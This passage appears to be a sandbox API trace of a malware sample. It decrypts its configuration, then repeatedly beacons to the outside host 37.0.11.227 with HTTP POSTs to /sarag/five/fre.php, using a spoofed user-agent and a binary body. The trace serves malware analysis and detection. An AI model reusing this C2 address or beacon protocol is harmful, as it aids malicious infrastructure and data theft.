(lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0341.467] GetProcessHeap () returned 0x690000 [0341.467] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0341.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.468] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0341.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.470] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0341.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.471] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.471] GetProcessHeap () returned 0x690000 [0341.471] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0341.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.472] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0341.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.476] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0341.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.481] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0341.481] GetProcessHeap () returned 0x690000 [0341.481] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0341.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.482] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0341.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.483] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0341.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.484] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0341.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.486] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0341.486] GetProcessHeap () returned 0x690000 [0341.486] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0341.486] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0341.486] GetProcessHeap () returned 0x690000 [0341.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0341.487] GetProcessHeap () returned 0x690000 [0341.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0341.487] GetProcessHeap () returned 0x690000 [0341.487] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0341.487] GetProcessHeap () returned 0x690000 [0341.487] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0341.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.498] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0341.505] GetProcessHeap () returned 0x690000 [0341.505] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0341.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.508] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0341.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.510] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0341.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.511] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.511] GetProcessHeap () returned 0x690000 [0341.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0341.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.512] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0341.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.513] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0341.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.514] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0341.515] GetProcessHeap () returned 0x690000 [0341.515] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0341.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.516] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0341.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.519] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0341.519] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.520] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0341.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.521] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0341.521] GetProcessHeap () returned 0x690000 [0341.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0341.521] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0341.521] GetProcessHeap () returned 0x690000 [0341.521] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0341.521] socket (af=2, type=1, protocol=6) returned 0xc50 [0341.522] connect (s=0xc50, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0341.546] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0341.546] GetProcessHeap () returned 0x690000 [0341.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0341.546] GetProcessHeap () returned 0x690000 [0341.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0341.547] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0341.548] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0341.548] GetProcessHeap () returned 0x690000 [0341.548] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0341.548] GetProcessHeap () returned 0x690000 [0341.549] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0341.549] GetProcessHeap () returned 0x690000 [0341.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0341.549] GetProcessHeap () returned 0x690000 [0341.549] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0341.552] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0341.553] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0341.553] GetProcessHeap () returned 0x690000 [0341.553] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0341.553] GetProcessHeap () returned 0x690000 [0341.553] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0341.554] send (s=0xc50, buf=0x6ad508*, len=242, flags=0) returned 242 [0341.554] send (s=0xc50, buf=0x6aba40*, len=159, flags=0) returned 159 [0341.554] GetProcessHeap () returned 0x690000 [0341.554] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0341.554] recv (in: s=0xc50, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0341.656] GetProcessHeap () returned 0x690000 [0341.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0341.656] GetProcessHeap () returned 0x690000 [0341.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0341.657] GetProcessHeap () returned 0x690000 [0341.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0341.657] GetProcessHeap () returned 0x690000 [0341.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0341.658] closesocket (s=0xc50) returned 0 [0341.658] GetProcessHeap () returned 0x690000 [0341.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0341.658] GetProcessHeap () returned 0x690000 [0341.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0341.659] GetProcessHeap () returned 0x690000 [0341.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0341.659] GetProcessHeap () returned 0x690000 [0341.659] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0341.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19a0) returned 0xc50 [0341.663] Sleep (dwMilliseconds=0xea60) [0341.665] GetProcessHeap () returned 0x690000 [0341.665] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0341.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.674] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0341.684] GetProcessHeap () returned 0x690000 [0341.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0341.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.686] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0341.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.687] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0341.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.700] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.700] GetProcessHeap () returned 0x690000 [0341.700] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0341.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.702] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0341.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.703] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0341.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.707] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0341.707] GetProcessHeap () returned 0x690000 [0341.707] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0341.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.708] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0341.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.710] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0341.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.711] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0341.711] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.712] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0341.712] GetProcessHeap () returned 0x690000 [0341.712] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0341.712] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0341.712] GetProcessHeap () returned 0x690000 [0341.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0341.713] GetProcessHeap () returned 0x690000 [0341.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0341.713] GetProcessHeap () returned 0x690000 [0341.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0341.713] GetProcessHeap () returned 0x690000 [0341.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0341.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.723] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0341.733] GetProcessHeap () returned 0x690000 [0341.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0341.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.734] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0341.735] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.735] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0341.736] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.736] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.736] GetProcessHeap () returned 0x690000 [0341.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0341.738] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.738] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0341.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.740] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0341.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.741] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0341.741] GetProcessHeap () returned 0x690000 [0341.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0341.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.742] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0341.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.743] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0341.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.745] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0341.746] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0341.746] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0341.746] GetProcessHeap () returned 0x690000 [0341.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0341.747] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0341.747] GetProcessHeap () returned 0x690000 [0341.747] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3b0 [0341.747] socket (af=2, type=1, protocol=6) returned 0xc54 [0341.747] connect (s=0xc54, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0341.789] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0341.789] GetProcessHeap () returned 0x690000 [0341.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0341.800] GetProcessHeap () returned 0x690000 [0341.800] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0341.807] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0341.808] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0341.808] GetProcessHeap () returned 0x690000 [0341.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0341.808] GetProcessHeap () returned 0x690000 [0341.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0341.812] GetProcessHeap () returned 0x690000 [0341.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0341.813] GetProcessHeap () returned 0x690000 [0341.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0341.813] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0341.814] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0341.814] GetProcessHeap () returned 0x690000 [0341.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0341.814] GetProcessHeap () returned 0x690000 [0341.815] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0341.815] send (s=0xc54, buf=0x6ad508*, len=242, flags=0) returned 242 [0341.816] send (s=0xc54, buf=0x6aba40*, len=159, flags=0) returned 159 [0341.816] GetProcessHeap () returned 0x690000 [0341.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0341.816] recv (in: s=0xc54, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0341.904] GetProcessHeap () returned 0x690000 [0341.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0341.904] GetProcessHeap () returned 0x690000 [0341.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0341.904] GetProcessHeap () returned 0x690000 [0341.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0341.905] GetProcessHeap () returned 0x690000 [0341.905] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0341.905] closesocket (s=0xc54) returned 0 [0341.906] GetProcessHeap () returned 0x690000 [0341.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3b0 | out: hHeap=0x690000) returned 1 [0341.906] GetProcessHeap () returned 0x690000 [0341.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0341.906] GetProcessHeap () returned 0x690000 [0341.906] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0341.907] GetProcessHeap () returned 0x690000 [0341.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0341.907] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19a4) returned 0xc54 [0341.911] Sleep (dwMilliseconds=0xea60) [0341.913] GetProcessHeap () returned 0x690000 [0341.913] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0341.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.914] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0341.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.923] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0341.938] GetProcessHeap () returned 0x690000 [0341.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0341.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.939] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0341.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.941] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0341.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.944] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0341.944] GetProcessHeap () returned 0x690000 [0341.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0341.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0341.946] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, 